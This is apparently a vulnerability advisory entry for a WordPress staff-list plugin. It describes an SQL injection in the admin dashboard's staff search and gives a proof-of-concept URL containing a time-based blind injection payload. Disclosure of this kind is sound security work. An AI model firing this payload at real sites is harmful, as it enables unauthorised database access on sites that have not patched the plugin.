EPSS: 0.006 (Low)
Percentile: 78.4%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement when searching for Staff in the admin dashboard, leading to an SQL injection.
Proof of concept:
https://example.com/wp-admin/admin.php?page=stafflist&search=test%'+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)+AND+'aa%'='aa
References
packetstormsecurity.com/files/166918/
vulners.com/exploitdb/EDB-ID:50928